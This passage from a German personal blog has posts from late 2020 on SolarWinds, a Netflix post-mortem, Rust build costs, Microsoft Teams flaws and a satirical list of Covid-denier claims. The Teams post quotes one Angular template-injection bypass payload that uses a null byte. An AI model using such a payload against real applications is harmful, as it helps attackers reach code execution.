Aber mal ganz realistisch: Was für Möglichkeiten hab ich denn da tatsächlich? Ich plane ja hier keine Kampagnen und Themenabende und hab kein Programm, das ich anpassen könnte. Ich blogge halt, was mir vor die Flinte kommt. Wenn ihr da Muster seht, dann ist das Confirmation Bias und das gemeinsame Aufrechterhalten einer gemeinsamen Realitätsstruktursimulation zwischen mir und meinen Lesern. Die Einsendungen richten sich ja thematisch danach, was es bei mir bisher so gab.
Oder es ist Apophänie, das kann auch sein. Was übrigens auch ein hochspannendes Thema ist, gerade jetzt. Ende September gab es ein lesenswertes Essay über QAnon aus Sicht eines Spiele-Entwicklers. Da geht es auch viel um Apophänie.
Update: Ich sollte vielleicht kurz darlege, wie ich das bislang betrachtet habe. Ich habe mir da einfach eine Tabelle gemacht. Pessimistische Erwartungshaltung, Optimistische Erwartungshaltung, und auf der anderen Achse "geht gut aus", "geht schlecht aus". Annahme: Auf das Geschehen habe ich keinen Einfluss. Meine Stellschraube ist die Erwartungshaltung. Mit der kann ich entscheiden, ob ich positiv oder negativ überrascht werde. Da nehm ich doch lieber die positive Überraschung!

Sat Dec 19 2020

[l] Beim Youtube-Versumpfen bin ich über diesen Vortrag eines australischen Profs gestoßen. Stellt sich raus: Während bei Pillen und Impfungen gerne mal doppelblinde Studien gegen Placebo-Kontrollgruppen gemacht werden, fliegt die Chirurgie ziemlich unter dem Radar.
Die Ergebnisse der ersten Placebo-Studien ist wie zu erwarten ziemlich verheerend, und häufig angewendete Verfahren stellen sich als unwirksam heraus.
Stellt sich natürlich direkt die Frage, wie man Chirurgie überhaupt gegen Placebo testen kann. Das merkt man doch als Patient, ob man aufgeschnitten wurde. Die Auflösung ist: Man führt das Verfahren durch, bis auf den kritischen Schritt. Den lässt man weg. D.h. Narkose wird gemacht, Patient wird aufgeschnitten, die eine Vene wird freigelegt, aber in der einen Gruppe klemmt man die ab, in der anderen halt nicht.
Das Video ist ein relativ kurzer Vortrag, nur 15 Minuten, und vor Ärzten, d.h. vielleicht für Laien nicht so gut wie dieser Vortrag desselben Australiers vor ein paar Massagetherapisten, ein bisschen laienverständlicher und mit mehr Anekdoten und Details, dafür auch eine Stunde lang statt nur 15 Minuten.
Update: Die Erkenntnisse gibt es auch in der deutschsprachigen Presse.

Thu Dec 17 2020

[l] Ihr habt ja mitgekriegt, dass Solarwinds Malware bei ihren Kunden aufgespielt hat.
Habt ihr schon eine Warnung gekriegt? Von auch nur einer der betroffenen Organisationen? Ich nicht.
Solarwinds ist da natürlich nicht nur Täter sondern auch Komplize bei der Beweisvernichtung, weil sie erstmal ihre Customer-Liste weggemacht und bei Google angerufen und aus dem Cache dort haben löschen lassen. Nicht mal archive.org liefert.
Ich finde das einen wichtigen Datenpunkt dazu, ob irgendeine der Meldepflichten den Betroffenen in der Praxis irgendwas bringt, oder ob das alles mal wieder bloß Verarschung ist.
Update: Wenn man einen Tag zurückgeht und viel Geduld aufbringt, kriegt man von archive.org doch noch die Kundenliste. Hier ist sie:
Acxiom, Ameritrade, AT&T;, Bellsouth Telecommunications, Best Western Intl., Blue Cross Blue Shield, Booz Allen Hamilton, Boston Consulting, Cable & Wireless, Cablecom Media AG, Cablevision, CBS, Charter Communications, Cisco, CitiFinancial, City of Nashville, City of Tampa, Clemson University, Comcast Cable, Credit Suisse, Dow Chemical, EMC Corporation, Ericsson, Ernst and Young, Faurecia, Federal Express, Federal Reserve Bank, Fibercloud, Fiserv, Ford Motor Company, Foundstone, Gartner, Gates Foundation, General Dynamics, Gillette Deutschland GmbH, GTE, H&R; Block, Harvard University, Hertz Corporation, ING Direct, IntelSat, J.D. Byrider, Johns Hopkins University, Kennedy Space Center, Kodak, Korea Telecom, Leggett and Platt, Level 3 Communications, Liz Claiborne, Lockheed Martin, Lucent, MasterCard, McDonald’s Restaurants, Microsoft, National Park Service, NCR, NEC, Nestle, New York Power Authority, New York Times, Nielsen Media Research, Nortel, Perot Systems Japan, Phillips Petroleum, Pricewaterhouse Coopers, Procter & Gamble, Sabre, Saks, San Francisco Intl. Airport, Siemens, Smart City Networks, Smith Barney, Smithsonian Institute, Sparkasse Hagen, Sprint, St. John’s University, Staples, Subaru, Supervalu, Swisscom AG, Symantec, Telecom Italia, Telenor, Texaco, The CDC, The Economist, Time Warner Cable, U.S. Air Force, University of Alaska, University of Kansas, University of Oklahoma, US Dept. Of Defense, US Postal Service, US Secret Service, Visa USA, Volvo, Williams Communications, Yahoo
Das ist aber nur eine partielle Liste. Da fehlen Kunden, die nicht genannt werden wollten.
[l] Bei Solarwinds haben auch die VCs Insider-Aktienverkäufe gemacht.

Tue Dec 15 2020

[l] Ihr solltet es euch zur Angewohnheit machen, nach euren Projekten Post-Mortems zu machen. Wenn es ein interessantes Problem gab, dann schreibt das auf. Egal ob ihr das gelöst habt oder nicht. Das unterscheidet den Menschen vom Tier, dass der Mensch auch von anderer Leute Fehlern lernen kann. Aber nur wenn die die auch aufgeschrieben haben!
Daher lese ich sehr gerne Post-Mortems. Hier hat Netflix einen schönen publiziert. Der hat mich ziemlich aus der Bahn geworfen.
Ich fasse mal grob zusammen. Die hatten da Abspiel-Ruckeln auf einem Gerät, und beim Debuggen haben sie rausgefunden, dass ihre Softwarearchitektur schlecht war. Die hat bei einem Scheduler-Framework von Android einen Callback in 15 Millisekunden beantragt, und hat dann Audiodaten für einen Frame rausgeschrieben.
Im Allgemeinen kam der Callback auch nach 15 ms, aber halt nicht immer. Manchmal kam der auch erst nach 55 ms.
Das war ein Bug in Android. Das will ich auch gar nicht schönreden.
Aber was mich daran irritiert: Wenn du beim System oder sonstwo einen Callback beantragst, dann musst du immer davon ausgehen, dass der zu spät kommt oder einer ausfällt. Wir haben es hier mit Best Effort zu tun, im ganzen System. Es könnte z.B. sein, dass das Gerät heißläuft und daher den CPU-Takt runterschraubt und dann für deine beantragten Events nicht genug Luft war. Oder es könnte sein, dass der Speicher knapp wurde, weil eine andere App irgendwas krasses gemacht hat, und das System dann Speicher von deiner App rausgeschmissen hat, um den Bedarf zu befriedigen. Der kann dann wieder reingeladen werden, aber das dauert halt Zeit.
Kurz gesagt: Wenn du dem System sagst, du willst jetzt 15 ms Pause machen, dann hast du genau eine tatsächliche Zusage: Es sind mindestens 15 ms. Nicht höchstens. Mindestens!
Mit anderen Worten: Dein Handler muss immer davon ausgehen, dass da ein Event verlorengegangen ist und in dem Fall dann halt mehr Audiodaten rausschreiben, um nicht ins Stocken zu geraten.
Und das führt dann dazu, dass man auch den Fall abhandeln muss, wo man ein Event zweimal kriegt, denn möglicherweise kommt das erste Event zu spät, schreibt dann zwei Frames raus, und dann kommt direkt das Event für den nächsten Frame, den man jetzt aber schon rausgeschrieben hatte.
Ich bin einigermaßen irritiert, dass Netflix ihre Software nicht so designed hat, dass sie mit dieser Art von Unvorhersehbarkeit klarkommt und das on the fly kompensiert. Ich hätte gedacht, dass das absolute Mindestanforderung an solche Systeme ist. Mir wäre das gar nicht in den Sinn gekommen, ein System zu bauen, was das nicht tut.
Die Lektion ist, dass man bei der API-Dokumentation auch offensichtliche Dinge immer explizit hinschreiben muss. Nur weil du das für offensichtlich hältst, heißt das nicht, dass es auch alle anderen für offensichtlich halten. Als Beispiel will ich hier mal die Man Page von nanosleep(2) zitieren:
If the interval specified in req is not an exact multiple of the granularity underlying clock (see time(7)), then the interval will be rounded up to the next multiple. Furthermore, after the sleep completes, there may still be a delay before the CPU becomes free to once again execute the calling thread.
Ich kenne jetzt diese Android-API nicht, weil ich noch nie Android programmiert habe, aber ich vermute mal, wenn das da so klar dokumentiert gewesen wäre, hätten die Netflix-Leute ihren Dienst nicht auf der Annahme fußen lassen, dass das immer alles perfekt genau wie beantragt reinkommt.

Mon Dec 14 2020

[l] Old and busted: Security by Obscurity.
New hotness: Security by Machine Learning (und wo die Daten herkommen ist geheim!1!!).
Sozusagen mehrlagige Obscurity. Da muss ja die Security echt enorm sein, die da am Ende rauskommt!
Ich bin mir sicher, dass etwaige Biases in den Daten ordentlich rauskorrigiert wurden!1!!
Auf der anderen Seite: Who cares. Wir werden eh nicht verstehen, wie die Software zu ihren Ergebnissen kommt. Wieso dann also auf gute Daten Wert legen? Deshalb heißt das doch künstliche Intelligenz! Wir gehen davon aus, dass die Software intelligent genug ist, sich da selbst zu korrigieren!!1!
Immerhin geht es ja um nichts wichtiges. Bloß um Law Enforcement.
Lacher am Rande: Diese Projekte werden von der EU selbst als besonders riskant und daher als regulationsbedürftig eingeschätzt. Wie genau sieht Regulierung bei Machine Learning aus? Das wollte ich schon immer mal jemanden fragen! Die haben sich da doch bestimmt voll tiefschürfende Gedanken gemacht, nicht wahr?

Sat Dec 12 2020

[l] Ich hatte hier ja vor einer Weile angesprochen, dass in England wöchentlich ein zufälliges Sample der Bevölkerung getestet wird, um ein unverzerrtes Lagebild zu kriegen. Ich fragte damals, ob wir das nicht auch so machen können.
der aktuelle Drosten-Podcast nimmt dazu Stellung (auf Seite 12 rechte Spalte). Ich zitiere mal:
Ja, das ist ein richtiger und sinnvoller Gedanke. […] Die Autoren wollen einfach klinische Studien haben, klinische Beobachtungsstudien, die die Verzerrungen nicht drin haben, die also dagegen arbeiten, die richtig kontrolliert sind und richtig quantitativ austariert sind. So etwas ist in England beispielsweise organisiert worden.
Und jetzt zur Lage in Deutschland:
In England wird systematisch wissenschaftliche Kooperation zwischen dem öffentlichen Gesundheitsdienst und der akademischen Wissenschaft, damit meine ich jetzt nicht das Gesundheitsamt oder im übertragenen Sinne auch das RKI, also die behördliche Seite, sondern Universitäten, akademische Forschung, das wird in England seit einigen Jahren systematisch. Das machen wir in Deutschland nicht. Da müssen wir unbedingt hinkommen. Aber nicht mehr während der jetzigen Pandemie. Es bringt niemandem etwas, sich darüber aufzuregen und allen Leuten irgendwelche Vorwürfe zu machen, ohne das Problem mit Lösungs-vorschlag zu versehen. Der Lösungsvorschlag ist: Wir müssen anerkennen, in England wird das viel besser gemacht. Für die jetzige Pandemie werden wir uns da nicht mehr aus dem Sumpf ziehen.
Das ist doch mal eine Ansage!
Drosten meint dann so, die Gesellschaft sei in England ähnlich genug, dass man sich hier an den Ergebnisse von deren Studien orientieren könne. (Danke, Rolf)

Fri Dec 11 2020

[l] Ich würde gerne noch den Hinweis loswerden, dass wir nicht raten müssen, ob Weihnachten bei der Familie eine schlechte Idee ist oder nicht.
Die Amis haben das freundlicherweise gerade für uns durchgetestet.
Die haben Thanksgiving ohne Lockdown gemacht.
Thanksgiving ist bei denen sowas wie bei uns Weihnachten. Man trifft sich mit der ganzen Familie und isst gemeinsam Truthahn.
Genau wie bei uns haben in den USA vorher die Experten gewarnt.
Aber mal unter uns: Man muss kein Experte sein, um intuitiv zu verstehen, dass das eine ganz doll schlechte Idee ist.
Na und jetzt? Guckt euch die Statistiken selber an, wie sich die Infektions- und Todeszahlen in den USA entwickelt haben.
Und jetzt? Jetzt fragt das ehemalige Nachrichtenmagazin in schöner Tradition, ob der Irakkrieg vielleicht doch eine schlechte … oh nein, sorry, bedauerliches Missverständnis. Ob Thanksgiving vielleicht ein Superspreading-Event war.
Tja, ich glaube ja, das werden wir nie herausfinden. Die Kurve ging ja eh die ganze Zeit nach oben. Das ist dann halt Schicksal. Kann man nichts machen.
[l] Wisst ihr, woran man erkennt, ob ein Bomber Atombomben abwirft oder konventionelle Bomben?
Daran ob seine Unterseite weiß bemalt ist. Nach so einer Atomexplosion wird ja eine Menge Infrarothitze frei, und es stellt sich raus: Wenn das deinen Bomber trifft, und du hast da von unten sichtbar eine schwarze Seriennummer oder so, dann absorbiert das mehr Hitze und fürt zu vorzeitiger Materialermüdung.
Bei der Library of Congress gibt es ein schönes Video über die Hitze-Tests, die sie damals an Häusern gemacht haben. Das Video heißt The House in the Middle.

Wed Dec 9 2020

[l] Die herunterfallende Betonplatte, die auf der A3 eine Passantin in ihrem Auto erschlagen hat, … das kann man nicht nur der Baufirma anlasten (WAS DU NICHT SAGST, Sherlock!). Da trifft auch die Behörden eine Mitschuld.
»Anders als zunächst nach dem Unfall angenommen, musste nach Auswertung der Bauakten festgestellt werden, dass diese nicht richtlinienkonforme Befestigung einiger Lärmschutzelemente der örtlich zuständigen Bauüberwachung des Landesbetriebes bekannt gewesen war«, heißt es im aktuellen Bericht des Verkehrsministeriums.
Tja. Das alte Spiel. Softw… äh … Behördenfehler. Da kann man nichts machen.
Die Abnahme sei nur unter Vorbehalt erfolgt. Nachdem die Firma nicht antwortete, habe man – so das Fazit des Berichts – irgendwann auch nicht mehr nachgefragt. Eine Prüfung durch Dritte habe es nicht gegeben. Die Firma meldete 2013 Insolvenz an.
Also WIR hier haben ja wohl ALLES gemacht!!1! Wir haben sogar ein paar E-Mails geschrieben!
Wartet, wird noch härter. Die Behörden lassen ja testen. Also in diesem Fall eher nicht so, da war ja ein Test verschoben worden, ihr erinnert euch, weil das so neu war, da kann ja unmöglich schon was kaputtgegangen sein! Aber wenn sie getestet hätten, wäre das auch nichts wert gewesen, denn:
»Es ist davon auszugehen, dass auch bei der kommenden Prüfung die fehlerhafte Konstruktion nicht aufgefallen wäre, weil sie versteckt hinter der Lärmschutzplatte liegt«, schreibt das Verkehrsministerium in dem Bericht.
Mit anderen Worten: Eher Sicht- als Lärmschutz, die Platten.
[l] So langsam fange ich an, den Nachteilen von Rust zu begegnen.
Konzeptionell bin ich ja ein Freund von Rust. Was die sich da an Neuerungen überlegt haben, das hat die Industrie insgesamt vor sich hergetrieben.
Von welchem Nachteil rede ich denn dann? Nun, ich baue hier regelmäßig mein Firefox selbst.
Mozilla stellt der Reihe nach Teile von Firefox auf Rust um.
Das ist ja auch gut so.
Aber zwei Effekte zeigen sich dabei schnell. Der erste ist, dass Rust nicht parallel baut. Neben den ganzen C++-Teilen, die vom Build-Prozess schön auf die Cores verteilt werden, läuft da dann halt ein cargo build für sowas wie 15 Minuten auf einem Core und baut den Rust-Kram. Noch gibt es genug C++-Zeug, dass das noch wenig zu Lasten der CPU-Auslastung geht, aber wenn man inkrementell baut und sich in der Zeit drei C++ und zwei Rust Quellcodedateien geändert haben, dann merkt man das deutlich, denn bei Rust ist die Unterscheidung zwischen Compiler und Linker anders verschoben. Der scheint immer eine Art LTO-Pass zu machen. Jedenfalls kommt es vor, dass der C++-Teil fertig ist und dann das make mit einer 100%-Auslastung auf einem Kern ewig lang an Rust herumrödelt.
Das ist das erste Problem. Das zweite Problem ist noch schwerwiegender. Rust verbraucht echt viel RAM. Ich habe hier eine Kiste mit 16 GB RAM. Die reicht bei praktisch allen Projekten, um die aus der Ramdisk (tmpfs) zu bauen. Nicht so bei Firefox. Da musste ich schon vor einer Weile die Quellen auf der Platte haben, weil sonst der Build mit out of memory abbrach. Jetzt ist es so, dass der Build auch beim von-Platte-bauen gerne mit out of memory abbricht. Stellt sich raus: Der LTO-Teil in dem Rust-Teil von Firefox schluckt mal eben sowas wie 13 GB am Stück. Wenn du da noch ein paar C++-Dateien parallel zu bauen versuchst, dann ist Ende Gelände.
Ich beobachte das mit großer Sorge, wie sorglos Entwickler mit dem Speicherbedarf ihrer Software umgehen. Ich habe noch zwei andere Projekte, bei denen der Speicher knapp wird. Qt muss ich auch von Platte bauen, nicht von Ramdisk. Und LLVM hat neuerdings einen Fortran-Compiler drin. Ich weiß nicht, was die da gemacht haben, aber das Bauen davon muss ich auf zwei Kerne zur Zeit beschränken, sonst frisst das zu viel RAM. Ich vermute eine Template-Instanziierungs-Hölle oder sowas. Der Fortran-Compiler setzt bei LLVM auf ein neueres Fundament als der C++-Compiler, ein generalisiertes Compilerframework namens mlir (ist auch Teil von LLVM).
Chrome und Libreoffice benutze ich nicht und habe ich daher auch nicht zu bauen versucht. Ich vermute mal, das wird mit 16 GB auch knapp.
Update: Dass Rust nicht parallel baut ist eigentlich auch nicht korrekt. Ich kann daher gerade das bei Firefox beobachtete Verhalten nicht erklären. Das liegt allerdings auch schon ein bisschen zurück, denn Firefox hat vor einer Weile angefangen, einfach gefühlt immer darauf zu bestehen, dass man einen komplett neuen Build startet und nicht inkrementell baut. Jedenfalls definitiv immer zwischen Versionen. Insofern kommt der Fall bei mir kaum noch vor, dass ich auf einen Rust warten muss bei Firefox.

Mon Dec 7 2020

[l] Leserbrief zu Teams:
zu Teams habe ich noch ein Ärgernis aus dem Feldeinsatz, das banal klingt, aber durchaus sicherheitsrelevant sein kann: die Anwendung klaut beim Öffnen den Eingabefokus. Und das ist nicht neu, siehe diesen Post von 2017:
Forumsposting bei Microsoft
Szenario: direkt nach dem Windows-Login einen Browser starten, um sich an einer Cloud-Anwendung anzumelden. Während der Passwort-Eingabe öffnet sich Teams etwas verzögert auf einem anderen Monitor mit dem Chat vom Vortag, zieht den Textcursor aus dem Browser-Passwortfeld ab und setzt ihn in seinem Chat ein. Sobald die Return-Taste gedrückt wird, ist die Unterhaltung um ein Geheimnis reicher.
Dieses Szenario ist so unrealistisch, dass es mir schon zweimal passiert ist (ja ja, fool me twice). Ich bin nur froh, dass meine Passwörter aktuell keine Schimpfwörter beinhalten. Man kann den Post zwar nachträglich löschen, aber er verschwindet nicht völlig aus dem Chat, sondern wird eine Weile als gelöscht markiert dargestellt. Alles sehr vertrauenswürdig.
Ich hab ja auch schon ein-zwei Mal bei Kunden Slack oder Teams einsetzen sollen und war jedesmal erschüttert, was für ein offensichtlicher Ranzkack das ist. Träge wie Treibsand, produktivitätsvernichtend wie Treibsand, ... wenn es dabei den Blutdruck nicht so hochtreiben würde, könnte man fast von einer Entschleunigung reden und es als Wellness-Maßnahme verkaufen.
Mir ist ja die ganze Zeit schon nicht klar, wieso irgendjemand seine eigenen Mitarbeiter mit sowas torpedieren würde.
Aber dann hab ich mir gedacht: Vielleicht ist das wie bei Behörden. Da bemisst sich die Wichtigkeit eines Abteilungsleiters ja auch daran, wie viele Leute der unter sich hat. Je mehr desto wichtiger. Das schafft Anreize, mehr Personal zu brauchen. Welche Maßnahme eignet sich besser als das gezielte Ausbremsen der Mitarbeiter durch Sabotagesoftware wie Slack oder Teams? Früher hat man dafür Großraumbüros und tägliche Statusmeetings gemacht, aber das ist ja mit Covid nicht mehr so möglich. Also muss man irgendwie anders verhindern, dass die Mitarbeiter keine komplexeren Gedanken fassen können.
In diesem Sinne: Teams ist das neue Großraumbüro.
[l] Woz hat eine neue Firma aufgemacht. Irgendwas mit Blockchain.
Das muss das bescheuertste Geschäftsmodell sein, das ich je gehört habe. Ich fasse mal zusammen.
Sagen wir mal: Ich betreibe eine Firma, die mit Kinderarbeit Covidplutoniumkohle fördert und den Fluss verschmutzt. Das wäre schon toll, wenn ich umweltfreundlicher handeln würde, für uns alle, aber guckt mich an! Ich investiere keinen Cent in Umweltschutz!
Also geht Woz' Firma zu den Baumumarmern und sammelt von denen Geld ein. Das Geld geben sie mir. Denn hey, wenn die Baumumarmer jemandem Geld geben wollen würden, dann ja wohl mir!1!!
Wartet, ist noch nicht fertig!!
Ich dämme mit dem Geld meine Büroräume, um Heizungskosten zu sparen, und tue damit was für die Umwelt. Die Kohle, die ich so einspare, verteilt Woz über Smart Contracts in der Blockchain-Cloud unter den Baumumarmern.
Stellt sich natürlich die Frage, woher Woz weiß, wieviel Geld ich einspare. Wieso würde ich dem die Wahrheit sagen?
Und was ist mit den Umweltschutzmaßnahmen, die nicht zu Kostenersparnis führen? Wie z.B. wenn ich den Kinderarbeitern Schutzkleidung geben würde?
Kurz: Lange nicht mehr so einen Bullshit gelesen. Und ausnahmsweise ist die Blockchain sogar nicht mal der absurdeste Teil des Geschäftsmodells.
[l] Benutzt hier jemand Teams?
Es gibt da einige beachtenswerte Details.
Erstens: Die Codequalität und das Design sind auffallend schlecht.
Zweitens: Wenn man einen Bug meldet, mit dem zero-click remote code execution geht, dann stuft das Teams-Team das nicht etwa als critical ein (dafür ist critical gedacht, um genau diesen Fall abzudecken), sondern als … "important, spoofing". Warum "important, spoofing"? Weil das noch in scope ist, um an dem Bug-Bounty-Programm teilzunehmen. Wenn es nicht in scope wäre, wären die Melder juristisch auch nicht an die Teilnahmebedingungen gebunden und könnten direkt 0days an Ransomware-Gangs verkaufen. Das ist also sowas wie der Mittelfinger von Microsoft an die Melder des Bugs.
Drittens:
angular expression filtering can be bypassed by injecting a nullbyte char in unicode \u0000, e.g.
{{3*333}\u0000}
Mit dem Nullbyte-Trick haben wir in den 90er Jahren Perl-Webapps aufgemacht. Das ist immer noch ein Problem bei Web-Entwicklern?!
Tja und die Remote Code Execution geht dann, weil dieser ranzige Gammelclient in Electron implementiert wurde, das ist im Wesentlichen ein Webbrowser mit Javascript, aber das Javascript hat Zugriff auf Filesystem und Systemresourcen und kann Prozesse starten. WAS FÜR EINE GROSSARTIGE IDEE!! Lasst uns mehr "Anwendungen" mit Electron machen! Wenn es eine Programmierumgebung gibt, in der wir Injection voll im Griff haben, dann ist es ja wohl Javascript!!1! (Danke, Bernd)

Thu Dec 3 2020

[l] Ihr habt ja wahrscheinlich mitgekriegt, dass dieser Terroranschlag am Breitscheidplatz immer noch vor sich hin eitert und da jetzt ein Untersuchungsausschuss zu aktiv ist.
Eine der Fragen ist, wie das denn jetzt genau mit Amris Mobiltelefon war.
[Die BKA-Ermittlerin] konnte beispielweise nicht erklären, wie Amri - oder eine andere Person - mit dem berühmten HTC-Handy vor dem Anschlag hätte kommunizieren können, da doch dessen SIM-Karte am Tattag gar nicht benutzt wurde.
Im zweiten Mobiltelefon von Amri, einem Samsung Klapp-Handy, das im LKW lag, steckte wiederum nicht einmal eine SIM-Karte. Die Telefonnummer dieser SIM-Karte war allerdings am 21. Dezember 2016 um 17:30 Uhr in der Funkzelle Kurfürstendamm in Berlin eingeloggt. Amri saß zu diesem Zeitpunkt im Zug von Amsterdam nach Brüssel, mutmaßlich unterwegs mit einem dritten Handy.
Das ist jetzt alles ein bisschen unübersichtlich. Klärung könnte vielleicht der BND herbeiführen, denn der hat von einem "ausländischen Partnergeheimdienst" Beweise zugesteckt bekommen. Die hat er dann prompt ... niemandem gezeigt.
Und jetzt kommt der Grund, warum ich das überhaupt ins Blog nehme. Die Ausrede des BND-Chefs dazu:
Antwort des BND-Präsidenten: "Wir haben es nicht vorenthalten, sondern vielleicht nur nicht in der gebotenen Eile weitergegeben."
Und das, meine Damen und Herren, ist jawohl ganz klar einer für die Geschichtsbücher. *badumm tssssss*
Update: Und falls jemand diesen Artikel vom Mai nicht mitgeschnitten hat:
Der Untersuchungsausschuss (UA) des Bundestags hat entdeckt, dass sich auf dem HTC-Handy des angeblichen Attentäters Amri, das in einem Karosserieloch des LKW lag, zwei Fotos befinden, die nach dem Anschlag gemacht wurden.
Wir erinnern uns: Das Telefon des Attentäters, das in dem Tat-LKW gefunden wurde, wo es der Einzeltäter zurückgelassen hatte. Da waren Fotos von nach dem Anschlag drauf.
Ich sage euch, die KI wird immer fortschrittlicher!1!!
Was sagt das BKA dazu?
Danach könnten die Bilder, so das BKA, über eine App, möglicherweise eine Google-App, automatisch auf das Handy gespielt worden sein. Beispielsweise gäbe es bei I-Phones die Technik, per App "Nachrichten des heutigen Tages, die Dich interessieren könnten" anzubieten und sie dann im Hintergrund auf dem Handy zur Verfügung zu stellen. Die Fotos auf Amris HTC-Handy fänden sich, so das BKA, auch auf Nachrichtenseiten von jenem Tag.
Das wird sich das Handy dann per Telepathie oder WLAN geholt haben, denn es war ja wie gesagt keine SIM-Karte drin.
Update: Ein Leser hat die Auflösung:
Also ich weiß nicht wie das bei dir ist, aber mein Handy verbindet sich automatisch mit bekannten WLAN-Netzen. Das wird bei Amris Handy wohl das gleiche gewesen sein, als das BKA das Handy dann bei sich hatte.

Fri Nov 27 2020

[l] Normalerweise lese ich die Englische Originalversion der Spec, wenn ich mich über was informieren will, aber manchmal lande ich versehentlich auf einer eingedeutschten Webseite.
Da findet man manchmal tolle Bonmots. Hier ist ein schönes:
Intel® Hardware Shield trägt dazu bei, das Risiko des Eindringens von Schadcode dadurch zu minimieren, dass der Arbeitsspeicher im BIOS beim Ausführen von Software gesperrt wird, um zu verhindern, dass eingeschleuste Malware das Betriebssystem beeinträchtigt.
Jahaa meine Damen und Herren! Wenn man Software wirklich sicher ausführen will, dann sperrt man einfach im BIOS den Arbeitsspeicher! Und dann kann eingeschleuste Malware das Betriebssystem nicht beeinträchtigen!
Tralafitti! *tusch.wav*
Für Nicht-Techies: Der Satz war fraktal falsch. Alles daran war falsch. Im BIOS sperrt man keinen Arbeitsspeicher, im BIOS sperrt man auch nichts "beim Ausführen von Software" sondern vor dem Starten des Betriebssystems. Zwischen Betriebssystem und Anwendungen gibt es bereits eine Schutzschicht. Malware kann nichts beeinträchtigen, Malware kann nur das Betriebssystem bitten, sich selbst kaputtzumachen. Wenn das Betriebssystem die Malware irgendwas beeinträchtigen lässt, hat es seinen Job nicht gemacht. Das ist genau der eine Job, den das Betriebssystem hat. Dafür sorgen, dass das nicht passiert.
[l] Rückblickend ärgere ich mich ja ein bisschen, kein Covidleugner-Bingo gemacht zu haben.
Das war ja eigentlich von Tag 1 an absehbar, dass die Leugner um ihre alten Lügen zu stützen einfach neue Lügen hinterherwerfen würden. Der Fachbegriff dafür heißt übrigens Gish gallop nach einem Evolutionsleugner.
Ich krieg ja hier lauter Mails von Leuten ab, die mir versuchen die Beweislast für ihre Behauptungen zuzuschieben, das find ich ja immer besonders dreist. "Ich hab hier diese Behauptung gesehen". "Hier ist ein Link, der das widerlegt". "Der Link geht zu einer Zeitung, unter peer reviewed top tier journal akzeptiere ich keine Beweise". ACH ABER DEIN HÖRENSAGEN SOLL ICH AKZEPTIEREN ODER WIE?!
Inzwischen sind wir bei Leuten angekommen, die Drostens Promotion leugnen. Was ja doppelt humoristisch ist. Dreifach eigentlich.
Erstens weil es ad hominem ist. Geht gegen die Person nicht seine Aussagen und Argumente. An der Stelle kann man das ja schon zu den Akten legen. Nur Trickbetrüger mit lauter Luschen in der Hand gehen ad hominem.
Zweitens weil es ihnen nicht gelingt, einen Nachweis zu erbringen, und sie sich jetzt daher herumzulügen genötigt sehen.
Drittens weil es völlig egal wäre. Selbst wenn das gestimmt hätte, könnte Drosten seinen Job ausüben und das würde auch den Wert seiner Arbeit zu Covid nicht beschädigen.
Wollen wir mal eine Liste der Felder machen?
Das Virus existiert gar nicht.
Das Virus existiert aber ist schon voll alt.
Das Virus existiert aber ist völlig ungefährlich.
Das Virus existiert und ist gefährlich und kommt aus einem Biowaffenlabor.
Masken helfen gar nicht.
Na gut, Masken helfen, aber die Maskenpflicht hilft nicht.
Maskenpflicht ist Faschismus!!1!
Social Distancing hilft nicht.
Social Distancing hilft, aber es vorzuschreiben ist Faschismus.
Kinder sind nicht ansteckend.
Na gut, Kinder sind doch ansteckend, aber nicht doll.
OK, Kinder sind genauso ansteckend, aber die werden nicht krank.
Na gut, Kinder sind ansteckend und werden krank, aber die Schulen müssen offen bleiben!!1!
Die Infektionsrate nimmt gar nicht wirklich zu.
Die Infektionsrate nimmt nur zu, weil mehr getestet wird.
Die Infektionsrate nimmt schon zu aber ist gar nicht aussagekräftig, wichtig ist die Todesrate.
Niemand stirbt an Covid.
Na gut, es gibt Tote, aber die sind nicht an sondern mit Covid gestorben.
OK OK es gibt Covid-Tote und die Zahl steigt auch, aber die wären eh demnächst alle gestorben.
OK OK auch junge gesunde Menschen sterben an Covid, aber die hatten dann halt kein gutes Immunsystem.
Es gibt keine Impfung.
Die Impfung wirkt nicht.
Die Impfung ist ein Vorwand um uns alle zu chippen.
OK die Impfung wirkt aber nicht gut.
Impfzwang ist Faschismus!
Da hätte man doch prima ein Bingofeld mit füllen können. Tja, Chance vertan.
Inzwischen gibt es ja sogar Versuche, irgendwie den Ruf des RKI zu erschüttern.
Was Paulchen über Peter sagt, sagt mehr über Paulchen als über Peter.
Update: Der Lockdown funktioniert nicht.
Die Zahlen sind schon vor dem Lockdown runtergegangen
Die Zahlen gehen nur runter, weil weniger getestet wird
Schau, die Grippezahlen gehen auch runter!
Schweden braucht auch keinen Lockdown!
OK Schweden hat jetzt auch Lockdown, aber die Schweiz braucht keinen Lockdown!
OK die Schweiz hat jetzt auch Lockdown, aber die Antarktis ... der Mond!!
Restaurants sind keine Hotspots
Der Spahn war ne Ausnahme. Das Restaurant war speziell.
Wir haben genug Intensivbetten
OK in Italien wird es eng, aber die zählen nicht
OK OK überall um uns herum sind die Intensivbetten voll, aber WIR haben genug!
Schau, diese irreführende Statistik hier sagt, wir haben doch noch Intensivbetten!
Drosten hat bestimmt gar nicht wirklich promoviert!1!!
Update: Drosten hat PCR (und das Virus) erfunden und kassiert jetzt Lizenzgebühren
PCR funktioniert gar nicht
PCR funktioniert, aber ist nicht validiert / zugelassen
PCR ist zu unempfindlich, findet alle Coronaviren
PCR ist zu empfindlich, sagt nicht ob man infiziert ist!
Nur weil PCR was findet, heißt das ja nicht, dass man auch erkrankt
Man sollte PCR nicht auf Gesunde verschwenden
Man sollte PCR nicht auf Kranke verschwenden
Ich fühl mich aber voll gesund!
Update: Hier das Update, auf das hier alle gewartet habt. Ein Leser hat mal 4chan nach Bingofeldern abgegrast.
"6%" (Referenz auf die Angabe des CDC, dass nur bei 6% der Toten tatsächlich Covid-19 die Todesursache ist)
In Tansania haben sie eine Ziege und eine Papaya positiv PCR-getestet, die Tests sind Blödsinn.
Malaria ist doch viel schlimmer!
Durchfall ist doch viel schlimmer!
Die Spanische Grippe war doch viel schlimmer!
"Nothingburger"
Sind doch alles Apokalyptiker (wahlweise mit dem Zusatz "die keine Frau abkriegen")
Einfach Vitamin C schlürfen, dann macht einen diese Grippe auch nicht krank
Die Chinesen haben ja schon wieder offen
Ich habe schon Rinderwahn/SARS 1.0/MERS/Dengue/Ebola/Zika/Hepatitis/HIV/whatever hinter mir, dieser Schnupfen wird mich nicht umbringen.
"Mein Immunsystem ..."
